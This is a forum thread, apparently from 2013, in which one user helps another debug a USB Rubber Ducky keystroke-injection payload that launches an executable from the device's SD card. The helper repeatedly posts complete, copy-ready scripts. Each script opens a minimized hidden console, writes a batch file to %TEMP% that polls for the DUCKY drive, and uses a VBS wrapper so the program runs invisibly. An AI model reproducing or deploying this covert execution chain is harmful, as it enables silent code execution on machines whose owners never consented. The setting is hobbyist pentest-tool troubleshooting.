mahorelee Posted June 24, 2013 Share Posted June 24, 2013 I got the payload to work but not with the .exe file I need it to work with. It will auto open paint or a calculator exe file but not this certain .exe file I have. The .exe file I have auto extracts documents and computer files into a folder. I have no idea why it will not work with this .exe but will with any other I have tried. The payload executes everything fine but the .exe does not open. This is the payload https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd Any help would be great. Thanks. Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 24, 2013 Share Posted June 24, 2013 (edited) I tried it with the batch payload I posted, and the target file does indeed create a Message.txt at in the desired location on the target computer. So, the batch logic that waits for the drive to be mounted appears to be working. C:\Windows\system32>erase /Q DuckyWait.bat C:\Windows\system32>copy con DuckyWait.bat :while1 for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d if Exist %myd% ( goto :break ) timeout /t 30 goto :while1 :break %myd%\MyExe.bat ^Z 1 file(s) copied. C:\Windows\system32>erase /Q invis.vbs C:\Windows\system32>copy con invis.vbs CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ^Z 1 file(s) copied. C:\Windows\system32>wscript.exe invis.vbs DuckyWait.bat C:\Windows\system32>dir Message.txt Volume in drive C has no label. Volume Serial Number is 2499-C7D7 Directory of C:\Windows\system32 File Not Found C:\Windows\system32>dir Message.txt Volume in drive C has no label. Volume Serial Number is 2499-C7D7 Directory of C:\Windows\system32 06/24/2013 02:07 PM 17 Message.txt 1 File(s) 17 bytes 0 Dir(s) 555,544,006,656 bytes free C:\Windows\system32> I also tried it with one of my Hello World executables, and observed that the output appears to either be suppressed, or is not launching the executable. I am trying to figure out which of the preceding scenarios is actually occurring. Edited July 2, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted June 24, 2013 Author Share Posted June 24, 2013 Yes the same is happening to me but you said it way better. Thank you for looking into it. Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 24, 2013 Share Posted June 24, 2013 (edited) I got it, need to add the START command before the executable name on that line in the batch file, ex... Line: STRING %myd%\myEXE.bat change to... STRING START %myd%\myEXE.exe Have now updated the payload to reflect this change. Edited June 24, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted June 25, 2013 Author Share Posted June 25, 2013 Now I am getting this error when I used the new script you posted. Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 25, 2013 Share Posted June 25, 2013 (edited) Looks like Git Hub added a few new lines where there wasn't supposed to be any. I think I deleted them all now. Look for lines that look like they are supposed to be on one line, but are divided into two lines. ex... STRING HELLO WORLD ENTER Here is another post of the payload I am using to launch my hello world executable. REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 25 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM STRING EXIT REM ENTER Edited July 2, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 25, 2013 Share Posted June 25, 2013 (edited) I tried this out on another Windows 7 computer, and now I am getting the same error that you are. The computer is refusing to write to the System32 folder. I believe that this has something to do with windows firewall, or something. I don't know if I will be able to find a solution to this particular problem. Simply changing the output folder may solve this particular problem. Edited June 25, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted June 26, 2013 Author Share Posted June 26, 2013 I wonder why the old code didn't have this problem but the new code does. I added STRING START %myd%\myEXE.exe in the old code but it did not work however it did not give me any errors like in the new code. Also why would a different output folder affect it if can not find the invis.vbs? Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 26, 2013 Share Posted June 26, 2013 (edited) I am putting a change directory command in the code so it will switch to the temp directory. The System32 folder appears to now be write protected by some process on the Windows 7 system. If anyone knows what is write protecting it I would like to know. Here is updated code, this should work. I have no idea why it is not allowing us to write there, my system allows it just fine. REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM STRING EXIT REM ENTER When I was having the error on the other computer I was talking about, copy con would act like it was going to work, and when I pressed enter to enter a line of code it hung, giving me an error about access being denied or something. Later on the script calls invis.vbs which consequently does not exist, which causes the popup box you posted. I actually didn't change that much in the code, the part that adds invis.vbs is exactly the same. I am betting that Microsoft rolled out some kind of a patch between testing the first version and the second version, which is why we are seeing different results.Whatever security setting is preventing the writing is probably turned off on my computer. Edited July 2, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 2, 2013 Author Share Posted July 2, 2013 I just tried the new code and it is still not working for me. I don't get the error any more but it will not run a notepad.exe renamed to HelloWorld like it did before or a HelloWorld.exe program. It does all that's in the picture but never runs the exit string for some reason and no program is run. If you need more details just ask, I don't see why it wouldn't be working for me. Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 2, 2013 Share Posted July 2, 2013 (edited) Sorry, this one is my fault. Missed a couple of colons in the script. Will go back and change other payloads so other people don't copy and paste the mistake. Here is the script you want. REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM STRING EXIT REM ENTER Edited July 2, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 2, 2013 Author Share Posted July 2, 2013 (edited) It now runs all the way through the cmd prompt but neither .exe will run. Edited July 2, 2013 by mahorelee Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 2, 2013 Share Posted July 2, 2013 I am sorry for the trouble you are having mahorelee. Unfortunately this script is fairly complex, and when I originally posted it online there were problems I still needed to iron out. I believe the script is now in working order now as it runs fine on my computer, so odds are the problem is on your end. Please post another picture of what the script does when it runs. Also, post which operating system you have. Also post what happens when you simply run the batch script by it's self without the visual basic file making it execute silently. I will need a print screen of that. EX... Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\UserName>DuckyWait.bat Here are also some things that could be going wrong. -Make sure you have the right firmware (Twin duck) -Make sure you are waiting for the ducky drive to mount, and after it mounts wait 1 minute at least. -Make sure you are compiling and running on the same computer, so there are no architecture issues. -Make sure you have a running executable file, and perhaps one you coded yourself. If you know C++ here is the hello world executable I am using at the bottom of the page. There is a copy file command in it so that it copies it's self to the desktop when it runs, but I commented it out for you. If you use it change the field UserName -Make sure the executable file is on the root of the ducky. -Make sure you updated the text file with the source code in it. -Make sure you copied the .inf file to the root of the drive -Make sure you re-named the ducky drive "DUCKY" #include <iostream> #include <Windows.h> using namespace std; int main(){ //CopyFileA("HelloWorld.exe", "C:\\Users\\UserName\\Desktop\\HelloWorld.exe",0); cout << "Hello World!!!" << endl; system("pause"); }//end main I am still thinking about what this could be, so I will check back here frequently. Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 2, 2013 Author Share Posted July 2, 2013 Okay thank you for your help. I do have TwinDuck I have left my Ducky in for a while each time so I do not think that is the problem I am running on the same computer (Windows 7) I do not know C++, I know Java and Python. But I have been using the default notepad exe file located on all windows and another exe I found. (I can make a hello world exe file with C++ if you think that would help, it would just take an hour or so) The exe file is on the root (see picture) Text file is updated ***I do not know what the .inf file is so that is not on the root of the Ducky. That might be the problem Drive is renamed to DUCKY The inject.bin is on the root of the drive too. I will do troubleshooting and take screenshots here shortly if the .inf file is not the problem. Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 2, 2013 Share Posted July 2, 2013 (edited) Forget about the .inf file, I forgot we use bin files. Also, how does one paste images into this forum, I can't find the option. Edited July 2, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 2, 2013 Author Share Posted July 2, 2013 Okay I will start doing what you asked. And below the yellow smiley face and a little to the left is an image button. You need to upload your picture to a site like photobucket then use the link to the image and plug it in. Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 2, 2013 Author Share Posted July 2, 2013 Here is what happens when the inject.bin is ran. It does this in cmd then exits out and the .exe never opens I do not understand how to run the batch file. Do I go to cmd to get to it? Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 2, 2013 Share Posted July 2, 2013 (edited) I see what is going wrong now, when you copied and pasted it I think the website may have changed its formatting or something. In the for loop the 'd' should be a 'do'. Here is my output for the program. You run the batch file simply by typing "DuckyWait.bat" into the command prompt. Edited July 2, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 2, 2013 Author Share Posted July 2, 2013 I posted the wrong picture, that was from before. This is the new one. Here is what happens when I run DuckyWait.bat (How did I get that batch file in the first place?) When the ducky mounts on my computer it mounts as (E) for the record. Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 2, 2013 Share Posted July 2, 2013 (edited) I have altered the payload posted earlier in this forum, please copy and paste the last one that I posted in this forum. Even if it looks like you already got the payload, I may have used the edit feature to change it. The last posting of the payload should correct your error. There are colons missing in the copy that you got. Also, my script uses the command line command "copy con" to generate DuckyWait.bat. Edited July 3, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 2, 2013 Author Share Posted July 2, 2013 The last posting of the code says last edited at 2:55 pm today. I tried it however and I get this in the cmd and the exit string does not get executed Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 5, 2013 Share Posted July 5, 2013 (edited) It is not in %appdata%, it is in %temp%. I probably commented out the exit string so you could see what it is doing, just un-comment it. Edited July 5, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 5, 2013 Author Share Posted July 5, 2013 It still does not run the exe. I tried going into the drive manually in the cmd and running it and it runs fine. So I do not know why it's not working. Is there any trouble shooting I can do for you that would help narrow down the problem? Quote Link to comment Share on other sites More sharing options...
mahorelee Posted July 5, 2013 Author Share Posted July 5, 2013 (edited) This is what happens when I run DuckyWait.bat, This pops up really fast but nothing else happens. When searching for wscript.exe nothing comes up invis.vbs does show up Edited July 5, 2013 by mahorelee Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 5, 2013 Share Posted July 5, 2013 You do not have the correct version of the code, copy and paste this in and it will work. REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER And just in case it doesn't work here is a different version with a slight tweak. REM Author: overwraith REM Name: RunEXE_V2.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if Exist %DUCKYdrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DUCKYdrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.